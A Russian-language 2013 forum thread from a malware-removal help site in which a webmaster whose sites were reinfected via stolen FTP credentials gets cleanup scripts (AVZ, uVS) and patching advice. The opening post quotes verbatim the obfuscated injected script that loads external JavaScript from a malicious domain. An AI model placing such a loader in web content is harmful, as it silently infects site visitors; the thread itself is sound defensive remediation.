Взломали компьютер, а после сервера с сайтами

Printable View

10.07.2013, 22:08
teropiuty

Взломали компьютер, а после сервера с сайтами

Здравствуйте уважаемые форумчане!

Проблема вот в чем.

Недели две назад в панели вебмастера системы Яндекс, стало выскакивать сообщение о том, что один из моих сайтов, распространяет вредоносный код, но я особо не придал этому значения, так как сообщение то появлялось, то пропадало. И вот неделю назад случилась ужасная вещь, заразилось шесть моих сайтов!

Причем расположенных на разных хостингах и соответственно серверах. После удаления вредоносного кода и смены паролей, тот самый вредоносный код снова появлялся, в течении одного-двух часов.

Вообщем перерыв кучу информации я понял, что возможно троянский вирус крадет коды FTP соединения с моего локального(домашнего) компьютера, при заходе на сайт через FTP. Как раз месяц назад у меня кончилась лицензия на антивирус Касперского, и я не купил новый ключ (а зря).

В общем не буду долго рассказывать что и как я делал, скажу вкратце.

1. Проверил компьютер, с помощь утилиты от [FONT=Arial][B]Dr. Web [/B][/FONT]в безопасном режиме. Было найдено около 8-вирусов, троянов и разных нежелательных файлов.

2. Проверил компьютер с помощью AVPTool от "Касперского". Нашел еще трех троянов.

3. После чего удалил Касперского без ключа, и установил Eset NOD32. И нашел еще четыре трояна и пару десятков подозрительных файлов (я их удалил на всякий пожарный, т.к. они были не системные и на работу ПК особо не влияли). У NOD32 хороший эврестический анализ, поэтому я скачал зараженный сайт с сервера себе на компьютер проверил нодом, и нашел еще один троян(хотя искал совсем не его).

В общем после всего этого, я еще раз поменял все пароли, и на одном хостинге вроде вирус ушел (прошли уже сутки, обычно за это время вредоносный код уже возвращался). А вот на втором ни в какую.

Возможно есть еще какой-то вирус, который ворует мои коды, но почему-то антивирусники его не находят. Проверил все по вашей инструкции - [URL]http://virusinfo.info/content.php?r=136-pravila[/URL]

Файлы логов выкладываю во вложениях.

P.S. Кстати код который подзагружается в один из файлов сайта выглядит так, может кто знает как его побороть

[B][FONT=monospace]<script>[/FONT][COLOR=#000000][FONT=monospace];document.write('<s'+'c'+'ript sr'+'c=h'+'tt'+'p://por'+'nite'+'rnns.r'+'u/8'+'1.j'+'s></sc'+'ri'+'pt>');[/FONT][/COLOR][FONT=monospace]</script[/FONT][/B]

Помогите пожалуйста.
10.07.2013, 22:09
Info_bot

Уважаемый(ая) [B]teropiuty[/B], спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в [URL="http://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="http://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
11.07.2013, 11:47
Vvvyg

[url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ[/url]:[code]begin
SearchRootkit(true, true);
DeleteService('RelevantKnowledge');
DeleteFile('C:\Users\Я\AppData\Roaming\Microsoft\Gsogom.exe');
DeleteFile('C:\Users\Я\AppData\Roaming\Microsoft\Zsogof.exe');
ExecuteSysClean;
ExecuteRepair(3);
ExecuteRepair(4);
RebootWindows(true);
end.[/code]Компьютер перезагрузится.

[url=http://virusinfo.info/showthread.php?t=121767]Сделайте полный образ автозапуска uVS[/url].
11.07.2013, 22:27
teropiuty

Благодарю за ответ.

Все сделал, как вы сказали. Файл лога прикрепляю.
11.07.2013, 23:08
Vvvyg

[url=http://virusinfo.info/showthread.php?t=121769]Выполните скрипт в uVS:[/url][code];uVS v3.80.12 [http://dsrt.dyndns.org]
;Target OS: NTv6.0

delref HTTP://WEBALTA.RU
delref HTTP://WWW.DELTA-SEARCH.COM/?AFFID=119357&BABSRC=HP_SS&MNTRID=88F8001D7DD2C19A
exec MsiExec.exe /quiet /I{86D4B82A-ABED-442A-BE86-96357B70F4FE}
exec MsiExec.exe /quiet /X{26A24AE4-039D-4CA4-87B4-2F83217017FF}
exec MsiExec.exe /quiet /X{26A24AE4-039D-4CA4-87B4-2F83216031FF}
exec MsiExec.exe /quiet /I{3248F0A8-6813-11D6-A77B-00B0D0160070}
uidel C:\Program Files\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge
deltmp
restart[/code]Компьютер перезагрузится.

[NOTICE]Данный скрипт удалит все устаревшие версии Java, т. к. в них имеются критические ошибки, позволяющие выполнить вредоносный код в целевой системе. Проще говоря - при заходе на сайт с вредоносным кодом внедрить в систему без ведома пользователя трояна.
Если Java нужна, т.е. без неё не работают какие-либо сайты, онлайн-игры и т. п., скачайте и установите [URL="http://www.java.com/ru/download/manual.jsp"]Java 7 Update 25[/URL]. Для большинства сайтов Java не нужна и является потенциальной дырой в безопасности.[/NOTICE]

Выполните скрипт в AVZ при наличии доступа в интернет:[CODE]var
LogPath : string;
ScriptPath : string;

begin
LogPath := GetAVZDirectory + 'log\avz_log.txt';
if FileExists(LogPath) Then DeleteFile(LogPath);
ScriptPath := GetAVZDirectory +'ScanVuln.txt';

if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
exit;
end;
end;
if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.[/CODE]
После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к броузерам, Java, Adobe Acrobat/Reader и Adobe Flash Player.
11.07.2013, 23:33
teropiuty

Я пока ничего не выполнил. Появилась другая проблема. Память да диске С (системном диске) куда-то делать гигабайт 20 сразу.
12.07.2013, 08:06
Vvvyg

Так выполните, места свободного прибавится.
12.07.2013, 11:35
teropiuty

Все сделал как вы сказали, память и правду отчистилась. Единственное что, после выполнения скрипта для uVS, и перезагрузки, никакого файла с префиксом ZOO_ не появилось.
12.07.2013, 11:38
Vvvyg

И не должно было появиться.
Устраняйте уязвимости.
12.07.2013, 12:47
teropiuty

Уязвимости устранил. Из было всего три:

[CODE]Уязвимость в MSXML делает возможным удаленное выполнение кода
http://www.microsoft.com/downloads/details.aspx?FamilyID=1e2738b9-d3c2-4dfe-8a79-335d5feee55b
Запускайте обновление от имени Администратора

Множественные уязвимости в Java JDK и JRE (32-разрядная версия). Деинсталлируйте старую версию и установите новую:
http://www.java.com/ru/download/manual_v6.jsp

Opera 11.50 устарела. Удалите её или установите новую
http://www.opera.com/browser/download[/CODE]
12.07.2013, 13:51
Vvvyg

Выполните [url="http://virusinfo.info/showthread.php?t=121902"]рекомендации после лечения[/url].
13.07.2013, 09:46
teropiuty

Благодарю за помощь. Пока что все работает отлично.